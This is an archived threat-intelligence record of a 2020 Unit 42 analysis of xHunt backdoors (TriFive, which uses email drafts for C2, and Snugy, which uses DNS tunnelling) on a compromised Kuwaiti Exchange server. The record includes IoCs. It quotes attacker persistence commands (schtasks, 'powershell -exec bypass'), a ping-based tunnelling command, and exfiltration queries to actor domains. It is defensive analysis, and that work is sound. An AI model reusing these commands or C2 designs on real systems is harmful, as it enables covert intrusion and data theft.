{ "id": "6a20b968-43eb-4333-8b33-0ba898c4fb39", "created_at": "2026-04-06T00:14:28.28433Z", "updated_at": "2026-04-10T13:11:55.204413Z", "deleted_at": null, "sha1_hash": "c5a8e3fb44ccf31e384339649875ebd374504407", "title": "xHunt Campaign: Newly Discovered Backdoors Using Deleted Email Drafts and DNS Tunneling for Command and Control", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 391641, "plain_text": "xHunt Campaign: Newly Discovered Backdoors Using Deleted\r\nEmail Drafts and DNS Tunneling for Command and Control\r\nBy Robert Falcone\r\nPublished: 2020-11-09 · Archived: 2026-04-05 14:14:47 UTC\r\nExecutive Summary\r\nThe xHunt campaign has been active since at least July 2018 and we have seen this group target Kuwait\r\ngovernment and shipping and transportation organizations. Recently, we observed evidence that the threat actors\r\ncompromised a Microsoft Exchange Server at an organization in Kuwait. We do not have visibility into how the\r\nactors gained access to this Exchange server. However, based on the creation timestamps of scheduled tasks\r\nassociated with the breach, we believe the threat actors had gained access to the Exchange server on or before\r\nAug. 22, 2019. The activity we observed involved two backdoors – one of which we call TriFive and a variant of\r\nCASHY200 that we call Snugy – as well as a web shell that we call BumbleBee.\r\nThe TriFive and Snugy backdoors are PowerShell scripts that provide backdoor access to the compromised\r\nExchange server, using different command and control (C2) channels to communicate with the actors. The TriFive\r\nbackdoor uses an email-based channel that uses Exchange Web Services (EWS) to create drafts within the Deleted\r\nItems folder of a compromised email account. The Snugy backdoor uses a DNS tunneling channel to run\r\ncommands on the compromised server. We will provide an overview of these two backdoors since they differ from\r\ntools previously used in the campaign.\r\nWe will be providing an analysis of the activity associated with the BumbleBee web shell in an upcoming blog.\r\nThat activity provides a glimpse into the threat actor's tactics, techniques and procedures when interacting with\r\ncompromised servers.\r\nPalo Alto Networks customers are protected from the attacks outlined in this blog in a variety of ways. See the\r\nConclusion for more details.\r\nTriFive and Snugy Backdoors\r\nIn September 2020, we were notified that threat actors breached an organization in Kuwait. The organization's\r\nExchange server had suspicious commands being executed via the Internet Information Services (IIS) process\r\nw3wp.exe. Actors issued these commands via a web shell we call BumbleBee that had been installed on the\r\nExchange server, which we will discuss in detail in a future blog. We investigated how the actors installed the web\r\nshell on the system, and we did not find any evidence of exploitation of the Exchange server within the logs that\r\nwe were able to collect. However, we did discover two scheduled tasks created by the threat actor well before the\r\ndates of the collected logs, both of which would run malicious PowerShell scripts. We cannot confirm that the\r\nactors used either of these PowerShell scripts to install the web shell, but we believe the threat actors already had\r\naccess to the server prior to the logs.\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/\r\nPage 1 of 10\n\nThe actors created two tasks on the Exchange server named ResolutionHosts and ResolutionsHosts, both of which\r\nwere created within the c:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\WDI folder. This folder also stores a\r\nlegitimate ResolutionHost task by default on Windows systems, as seen in Figure 1. The legitimate\r\nResolutionHost task is associated with the Windows Diagnostic Infrastructure (WDI) Resolution host that is used\r\nto provide interactive troubleshooting for problems that arise on the system. We believe that the actor chose these\r\ntask names specifically to blend in and appear to be part of the legitimate WDI.\r\nFigure 1. Legitimate ResolutionHost Task associated with the Windows Diagnostic Infrastructure Resolution host.\r\nThe tasks running the backdoors appear to imitate this task.\r\nOn Aug. 28 and Oct. 22, 2019, the actors created the ResolutionHosts and ResolutionsHosts tasks to run two\r\nseparate PowerShell-based backdoors. The actors used these two scheduled tasks as a persistence method, as they\r\nran the two PowerShell scripts repeatedly, albeit at different intervals. Table 1 shows the two tasks and their\r\nassociated creation times, run intervals and the command executed. The commands executed by the two tasks\r\nattempt to run splwow64.ps1 and OfficeIntegrator.ps1, which are backdoors that we call TriFive and a variant of\r\nCASHY200 that we call Snugy, respectively. The scripts were stored in two separate folders on the system, which\r\nis likely an attempt to avoid both backdoors being discovered and removed.\r\nTask Created Time\r\nRun\r\nInterval\r\nCommand\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/\r\nPage 2 of 10\n\nResolutionHosts\r\n2019-08-\r\n28T20:01:34\r\n30\r\nminutes\r\npowershell -exec bypass -file\r\nC:\\Users\\Public\\Libraries\\OfficeIntegrator.ps1\r\nResolutionsHosts\r\n2019-10-\r\n22T15:02:39\r\n5 minutes\r\npowershell -exec bypass -file\r\nc:\\windows\\splwow64.ps1\r\nTable 1. Scheduled tasks used to persistently run malicious PowerShell-based backdoors.\r\nThe table also shows that the two backdoors were executed at different intervals, with TriFive backdoor running\r\nevery five minutes and the Snugy backdoor running every 30 minutes. We cannot confirm the exact reason behind\r\nthe difference in intervals, but it may have to do with the stealthiness of the C2 channel associated with the\r\nbackdoor. For instance, Snugy may have a longer interval than TriFive as it uses DNS tunneling as a C2 channel,\r\nwhich is a more well-known C2 channel with a higher likelihood of detection compared to the previously\r\nunknown email-based C2 channel used by TriFive.\r\nWe were not able to confirm how the actors created the ResolutionHosts and ResolutionsHosts tasks. However, we\r\nare aware of the actors using batch scripts to create scheduled tasks named SystemDataProvider and CacheTask-when installing Snugy samples on other systems. For instance, the following batch script creates and runs a\r\nscheduled task named SystemDataProvider to run the Snugy sample named xpsrchvw.ps1:\r\nschtasks /create /sc MINUTE /mo 5 /tn \"\\Microsoft\\Windows\\SideShow\\SystemDataProvider\" /tr \"powershell -\r\nexec bypass -file C:\\Windows\\Temp\\xpsrchvw.ps1\" /ru SYSTEM \u0026 schtasks /run /tn\r\n\"\\Microsoft\\Windows\\SideShow\\SystemDataProvider\"\r\nTriFive Backdoor\r\nTriFive is a previously unseen PowerShell-based backdoor that the xHunt actors installed on the compromised\r\nExchange server, executing every five minutes via a scheduled task. TriFive provided backdoor access to the\r\nExchange server by logging into a legitimate user's inbox and obtaining a PowerShell script from an email draft\r\nwithin the deleted emails folder. The TriFive sample used a legitimate account name and credentials from the\r\ntargeted organization. This suggests that the threat actor had stolen the account's credentials prior to the\r\ninstallation of the TriFive backdoor.\r\nThe use of email drafts and a shared email account between the Trojan and actor to facilitate C2 communications\r\nis not a new technique for the actors associated with xHunt. In fact, this same general technique was used by the\r\nemail-based C2 in the Hisoka tool discussed in the initial publication about the xHunt campaign in September\r\n2019. While the Hisoka tool used email drafts to send and receive data, these drafts remained in the Drafts folder,\r\nwhereas the TriFive backdoor specifically saves its email drafts to the Deleted Items folder instead.\r\nTo issue commands to the backdoor, the actor would log into the same legitimate email account and create an\r\nemail draft with a subject of 555, including the command in encrypted and base64 encoded format. Figure 2\r\nshows an example command email with a subject of 555 and a message body of woFyeWt3cw==, which decodes\r\nand decrypts to whoami. The script would execute this via PowerShell.\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/\r\nPage 3 of 10\n\nFigure 2. Email draft in Deleted Items folder issuing command to TriFive backdoor.\r\nTo run the commands supplied by the actor, the PowerShell script logs into a legitimate email account on the\r\nExchange server and checks the Deleted Items folder for emails with a subject of 555. The script opens the email\r\ndraft, base64 decodes the contents in the message body of the email and decrypts the decoded contents by\r\nsubtracting 10 from each character. The script then runs the resulting cleartext using PowerShell's built-in Invoke-Expression (iex) cmdlet. After executing the provided PowerShell code, the script will encrypt the results by\r\nadding 10 to each character and base64 encoding the ciphertext. TriFive will then send the command results to the\r\nactor by setting the encoded ciphertext as the message body of an email draft that it will save in the Deleted Items\r\nfolder with the subject of 555 s. Figure 3 shows an example email draft in the Deleted Items folder created by the\r\nTriFive script to transmit the results of the command issued, which has a subject of 555 s and a message body of\r\nbQB5AHgAfgB5AH0AeQBmAGsAbgB3AHMAeABzAH0AfgB8AGsAfgB5AHwA, which decodes and\r\ndecrypts to contoso\\administrator.\r\nFigure 3. Email draft in Deleted Items folder created by TriFive backdoor to send results to C2.\r\nThe TriFive PowerShell script does not have any loops to continually run on a system. Instead, TriFive relies on\r\nthe previously mentioned ResolutionsHosts scheduled task for persistence.\r\nSnugy Backdoor\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/\r\nPage 4 of 10\n\nThe OfficeIntegrator.ps1 file seen in the ResolutionHosts task is a PowerShell-based backdoor we call Snugy,\r\nwhich allows an actor to obtain the system's hostname and to run commands. Snugy is a variant of the\r\nCASHY200 backdoor used by actors in previous attacks in the xHunt campaign. In July 2019, Trend Micro\r\ncreated a detection signature for this backdoor called Backdoor.PS1.NETERO.A, which suggests that this\r\nparticular variant of CASHY200 has been around for over a year. We are calling this variant of the backdoor\r\nSnugy, as Netero is already a name of a variant of the Hisoka tool used by the xHunt actors.\r\nWe observed the following code overlaps between this Snugy tool and CASHY200:\r\n1. Function used to convert strings to hexadecimal representation.\r\n2. Function used to generate a string of random upper and lowercase characters.\r\n3. Regular expression to extract resolved IP address from either the ping or nslookup command, depending on\r\nthe sample.\r\n4. Command handler uses the first octet of IP address to determine the command to run.\r\n5. Command handler has the same two commands available: get hostname and run command.\r\nMuch like CASHY200, Snugy uses DNS tunneling to communicate with its C2 server, specifically by issuing\r\nDNS A record lookups to resolve custom crafted subdomains of actor-controlled C2 domains. However, the\r\nstructure of the custom crafted domains differs dramatically from previous CASHY200 samples due to the\r\nfollowing:\r\n1. Variable values for important fields in the subdomain.\r\n2. Randomly chosen order of the fields in the data section.\r\n3. Randomly chosen C2 domains for each outbound query.\r\n4. Can only transmit one byte of data per query instead of 11.\r\nThe differences in the subdomains and amount of data that each query can transmit is the main reason we gave\r\nthis particular sample its own variant name. The Snugy sample was configured to choose one of the following\r\ndomains at random as its C2 domain:\r\nhotsoft[.]icu\r\nuplearn[.]top\r\nlidarcc[.]icu\r\ndeman1[.]icu\r\nLike early variants of CASHY200, the Snugy variant uses the following command to ping a custom crafted\r\ndomain, which ultimately attempts to resolve the domain before sending the ICMP requests to the resolving IP\r\naddress:\r\ncmd /c ping -n 1 \u003ccustom crafted sub-domain\u003e.\u003cC2 domain\u003e\r\nSnugy will extract the IP address that the ping application resolved using the following regular expression to\r\ngather the IP address from the ping results:\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/\r\nPage 5 of 10\n\n\\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\b\r\nThis regular expression is publicly available on many sites as a way to extract or validate IP addresses. However,\r\nwe saw this same regular expression in the CASHY200 tool used in previous xHunt attacks. Snugy also has the\r\nsame command set available as CASHY200 and uses the first octet to determine the command the actor wishes to\r\nrun. Table 2 shows the two numbers that will either send the hostname of the system to the C2 or run a command.\r\nThe first octets of 86 and 102 differ from CASHY200's 48 and 92, but both backdoors use the second octet to\r\ndetermine how many DNS queries the backdoor needs to issue to download the command from the C2.\r\nIP address Description\r\n86.x.x.x Runs hostname command and sends results to C2\r\n102.\u003c# of queries\u003e.x.x Run command via cmd /c and send results to C2\r\nTable 2. Snugy backdoor command handler.\r\nThe subdomains created by Snugy include a communication type field, a field specifying the order of elements in\r\nthe data section, and lastly the data section, as seen in the following C2 domain structure:\r\n\u003ccharacter for communication type\u003e\u003ccharacter for order of fields in data section\u003e\u003cdata section\u003e.\u003cC2 domain\u003e\r\nAs previously mentioned, the structure of the subdomain differs dramatically from previous variants. Not only\r\ndoes it introduce multiple possible values for each communication type, but it also includes a random order of\r\nfields in the data section of the subdomain as well. The first character in the subdomain generated by Snugy is the\r\ncommunication type, which tells the C2 server the purpose of the inbound DNS query. Table 3 shows the possible\r\ncharacters for each communication type that Snugy will choose at random when constructing the subdomain, as\r\nwell as the purpose of each type.\r\nComm Type Description\r\n'q','b','e','d' or 'm' Initial Beacon\r\n'z','j','r','p' or 'x' Sending the hostname as data to the C2 server\r\n's','n','u','g' or 'y' Requesting a chunk of data from C2 server\r\n'c','f','v','h' or 'k' Sending the results of command execution as data to the C2 server\r\n'i','t','o','l' or 'w' Notification of the end of the data transmission\r\nTable 3. Communication types and their purpose in Snugy's DNS tunneling protocol.\r\nThe second character in the subdomain generated by Snugy tells the C2 server the order of the fields in the\r\nsubsequent data section of the subdomain. The data section of the subdomain contains the following three fields\r\nand their corresponding 0, 1 or 2 index used by Snugy to specify the order of the fields:\r\n0. 4 hexadecimal characters representing a 2-byte campaign code\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/\r\nPage 6 of 10\n\n1. 2 random characters\r\n2. 2 hexadecimal characters representing one byte of data, followed by a sequence number between 1 and 9\r\nSnugy uses the 0, 1 and 2 index to order the fields in the data section and includes the order character so the C2\r\nunderstands how to parse inbound queries. Table 4 shows the order of data fields and the corresponding character\r\nused to represent the order. It should be noted that the data section is blank in the initial beacon communication\r\ntype.\r\nIndex Order Character Structure of data field\r\n012 t \u003ccampaign code\u003e\u003crandom characters\u003e\u003cdata and sequence number\u003e\r\n021 m \u003ccampaign code\u003e\u003cdata and sequence number\u003e\u003crandom characters\u003e\r\n102 d \u003crandom characters\u003e\u003ccampaign code\u003e\u003cdata and sequence number\u003e\r\n120 h \u003crandom characters\u003e\u003cdata and sequence number\u003e\u003ccampaign code\u003e\r\n201 p \u003cdata and sequence number\u003e\u003ccampaign code\u003e\u003crandom characters\u003e\r\n210 z \u003cdata and sequence number\u003e\u003crandom characters\u003e\u003ccampaign code\u003e\r\nTable 4. Order of data fields and the corresponding character used in Snugy's DNS tunneling protocol.\r\nThe Snugy DNS tunneling protocol can only send one byte of data per query, making it quite inefficient at\r\nexfiltrating data, but the use of DNS A record queries suggests that the DNS tunneling protocol can receive four\r\nbytes of data per DNS query. For instance, if the C2 server resolves the beacon query to an IP address that has\r\n“86” as its first octet, Snugy will issue the 12 queries to transmit the host name “WIN-DESKTOP” to the C2\r\nserver. Table 5 shows these 12 queries with each subdomain parsed as the C2 would upon receipt of the query.\r\nThis table highlights the inefficiency of this DNS tunneling protocol for data exfiltration.\r\nDomain Parsed domain – Comm Type,Order,Data Ordered\r\njp5717266vd.lidarcc.icu j (hostname) p (201) 57 ('W' data) 1 (seq) 7266 ('rf') vd (rand)\r\njhxv4927266.hotsoft.icu j (hostname) h (120) xv (rand) 49 ('I' data) 2 (seq) 7266 ('rf')\r\njp4e37266iB.hotsoft.icu j (hostname) p (201) 4e ('N' data) 3 (seq) 7266 ('rf') iB (rand)\r\njz2d4gs7266.deman1.icu j (hostname) z (210) 2d ('-' data) 4 (seq) gs (rand) 7266 ('rf')\r\njp4457266xr.hotsoft.icu j (hostname) p (201) 44 ('D' data) 5 (seq) 7266 ('rf') xr (rand)\r\njm7266456Va.hotsoft.icu j (hostname) m (021) 7266 ('rf') 45 ('E' data) 6 (seq) Va (rand)\r\njhNK5377266.uplearn.top j (hostname) h (120) NK (rand) 53 ('S' data) 7 (seq) 7266 ('rf')\r\njt7266CF4b8.lidarcc.icu j (hostname) t (012) 7266 ('rf') CF (rand) 4b ('K' data) 8 (seq)\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/\r\nPage 7 of 10\n\njp5497266qV.uplearn.top j (hostname) p (201) 54 ('T' data) 9 (seq) 7266 ('rf') qV (rand)\r\njt7266iW4f1.lidarcc.icu j (hostname) t (012) 7266 ('rf') iW (rand) 4f ('O' data) 1 (seq)\r\njm7266502HA.lidarcc.icu j (hostname) m (021) 7266 ('rf') 50 ('P' data) 2 (seq) HA (rand)\r\not7266Ng502.hotsoft.icu o (done) t (012) 7266 ('rf') Ng (rand) 50 ('P' data) 2 (seq)\r\nTable 5. Example queries of Snugy sending the hostname over DNS tunneling protocol.\r\nWe did observe the threat actors using the Snugy tool to run commands and exfiltrate the results, as we were able\r\nto obtain the domains queried via ping requests sent from the compromised server. Based on the exfiltrated data\r\nfrom within the subdomains, we were able to determine the actors ran ipconfig /all and dir. Unfortunately, we only\r\nhad a subset of the requests so the data exfiltrated was truncated, which also suggests that the actors likely ran\r\nother commands that we did not observe.\r\nWe found a second Snugy sample on another server at the same Kuwaiti organization with a name of SyncRes.ps1\r\nand a SHA256 hash of a4a0ec94dd681c030d66e879ff475ca76668acc46545bbaff49b20e17683f99c. The actor\r\ninstalled this Snugy sample by saving this PowerShell script to C:\\Windows\\System32\\bg-BG and by creating a\r\nscheduled task named ResolutionHosts within the c:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\RAC folder\r\nto run the PowerShell script every 20 minutes. This particular Snugy sample only uses one root domain for C2,\r\nspecifically sharepoint-web[.]com, and uses a different structure for its custom crafted subdomains for its DNS\r\ntunnel:\r\n\u003ccharacter for communication type\u003e\u003ctwo random digits\u003e46\u003c3-bytes hexlified data section\u003e.\u003cC2 domain\u003e\r\nThis Snugy sample uses a single character from a hardcoded character set at the beginning of the subdomain to\r\nsignify the communication type. The character sets used for the communication type are the same as the\r\npreviously discussed OfficeIntegrator.ps1 variant, but with the exception of snugy, the character sets signify\r\ndifferent communication types, as seen in Table 6. Table 6 also shows that this sample only has three\r\ncommunication types. The sample does not include the hostname command. Rather, it can only run commands if\r\nthe C2 answers the beacon query with an IP address with 199 as the first octet.\r\nComm Type Description\r\n'i','t','o','l' or 'w' Initial Beacon\r\n's','n','u','g' or 'y' Requesting a chunk of data from C2 server\r\n'q','b','e','d' or 'm' Sending the results of command execution as data to the C2 server\r\nTable 6. Communication types and their purpose in the DNS tunneling protocol found in the second Snugy sample.\r\nInfrastructure Links to xHunt\r\nThe infrastructure associated with the activity outlined in this blog involves the five domains that Snugy\r\ncommunicated with as its C2 using DNS tunneling, specifically hotsoft[.]icu, uplearn[.]top,\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/\r\nPage 8 of 10\n\nlidarcc[.]icu, deman1[.]icu and sharepoint-web[.]com. While there was not a lot of overlap with other\r\ninfrastructure, the domain ns1.alforatsystem[.]com resolved to the same IP address as several of the ns1 and ns2\r\nsubdomains on the Snugy C2 domains in May 2019, as seen in Table 7.\r\nDomain Passive DNS First seen\r\nns1.hotsoft[.]icu 198.98.48[.]181 05/06/2019 10:48:37 AM\r\nns2.hotsoft[.]icu 198.98.48[.]181 05/06/2019 10:48:37 AM\r\nns1.uplearn[.]top 198.98.48[.]181 05/11/2019 11:42:40 AM\r\nns2.uplearn[.]top 198.98.48[.]181 05/11/2019 11:42:40 AM\r\nns1.lidarcc[.]icu 198.98.48[.]181 05/08/2019 12:53:29 PM\r\nns2.lidarcc[.]icu 198.98.48[.]181 05/08/2019 12:53:29 PM\r\nns1.deman1[.]icu 198.98.48[.]181 05/08/2019 10:30:24 AM\r\nns2.deman1[.]icu 198.98.48[.]181 05/08/2019 10:30:24 AM\r\nns1.alforatsystem[.]com 198.98.48[.]181 05/05/2019 8:41:38 AM\r\nns2.alforatsystem[.]com 198.98.48[.]181 05/05/2019 8:41:38 AM\r\nTable 7. Infrastructure overlap between Snugy C2 domains and a domain previously used in xHunt.\r\nActors used the alforatsystem[.]com domain to host ZIP archives that they used to deliver LNK shortcut files to\r\ninstall backdoors in previous attacks during the xHunt campaign. The alforatsystem[.]com domain also has\r\nsignificant infrastructure overlap with other domains associated with xHunt as discussed in our previous\r\npublications, such as firewallsupports[.]com and pasta58[.]com, among others.\r\nIndicators of Compromise\r\nTriFive Samples\r\n407e5fe4f6977dd27bc0050b2ee8f04b398e9bd28edd9d4604b782a945f8120f\r\nSnugy Samples\r\nc18985a949cada3b41919c2da274e0ffa6e2c8c9fb45bade55c1e3b6ee9e1393\r\n6c13084f213416089beec7d49f0ef40fea3d28207047385dda4599517b56e127\r\nefaa5a87afbb18fc63dbf4527ca34b6d376f14414aa1e7eb962485c45bf38372\r\na4a0ec94dd681c030d66e879ff475ca76668acc46545bbaff49b20e17683f99c\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/\r\nPage 9 of 10\n\nSnugy C2 Domains\r\ndeman1[.]icu\r\nhotsoft[.]icu\r\nuplearn[.]top\r\nlidarcc[.]icu\r\nsharepoint-web[.]com\r\nScheduled Task Names\r\nResolutionHosts\r\nResolutionsHosts\r\nSystemDataProvider\r\nCacheTask-Source: https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/\r\nhttps://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/" ], "report_names": [ "xhunt-campaign-backdoors" ], "threat_actors": [ { "id": "20bc5b83-9ea0-4e60-a23e-19bf203dc9fb", "created_at": "2022-10-25T16:07:24.432777Z", "updated_at": "2026-04-10T02:00:04.986077Z", "deleted_at": null, "main_name": "xHunt", "aliases": [ "Cobalt Katana", "Hive0081", "Hunter Serpens", "SectorD01" ], "source_name": "ETDA:xHunt", "tools": [ "CASHY200", "COLDTRAIN", "Gon", "Hisoka", "Killua", "Netero", "SHELLSTING", "Sakabota", "Snugy", "TriFive" ], "source_id": "ETDA", "reports": null }, { "id": "c5a103eb-08af-410b-b11d-3635f4d4a3eb", "created_at": "2025-08-07T02:03:24.756187Z", "updated_at": "2026-04-10T02:00:03.667108Z", "deleted_at": null, "main_name": "COBALT KATANA", "aliases": [ "Hive0081 ", "SectorD01 ", "xHunt campaign " ], "source_name": "Secureworks:COBALT KATANA", "tools": [ "CASHY200", "Diezen", "Eye", "Gon", "Hisoka", "Hisoka Netero", "HyphenShell", "Killua", "Sakabota", "Sakabota Framework" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434468, "ts_updated_at": 1775826715, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c5a8e3fb44ccf31e384339649875ebd374504407.pdf", "text": "https://archive.orkl.eu/c5a8e3fb44ccf31e384339649875ebd374504407.txt", "img": "https://archive.orkl.eu/c5a8e3fb44ccf31e384339649875ebd374504407.jpg" } }